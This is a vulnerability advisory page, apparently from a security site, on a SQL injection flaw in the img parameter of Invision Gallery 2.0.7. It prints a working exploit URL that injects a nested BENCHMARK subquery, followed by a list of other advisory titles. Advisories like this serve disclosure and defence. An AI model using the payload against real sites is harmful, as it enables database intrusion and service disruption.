exploits , vulnerabilities , articles , Invision Gallery Index.PHP IMG Parameter SQL Injection Vulnerability

Title	Invision Gallery Index.PHP IMG Parameter SQL Injection Vulnerability
Published	2006-12-01-12:00AM
Updated	2006-12-04-06:44PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	infection@mail.kz is credited with the discovery of this vulnerability.
Vulnerable	Invision Power Services Invision Gallery 2.0.7
Not Vulnerable
Code	Attackers can exploit these issues via a web client. The following exploit is available: http://www.example.com/index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-03 IBM Rational ClearQuest Maintenance Tool Local Information Disclosure Vulnerability
• 2008-12-03 VMware Products Unspecified Host Memory Corruption Vulnerability
• 2008-12-03 IBM Rational ClearQuest Web Multiple Unspecified Cross Site Scripting Vulnerabilities
• 2008-12-02 RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
• 2008-12-02 Softbiz Classifieds Script Multiple Cross Site Scripting Vulnerabilities
• 2008-12-02 CodeToad ASP Shopping Cart Script Cross Site Scripting Vulnerability
• 2008-12-02 xrdp Multiple Buffer Overflow Vulnerabilities
• 2008-12-02 FFmpeg Multiple Denial of Service Vulnerabilities
• 2008-12-01 SystemImager Flamethrower Insecure Temporary File Creation Vulnerabilities
• 2008-12-01 Rumpus FTP Server Command Argument Remote Buffer Overflow Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 19:41:58 +0000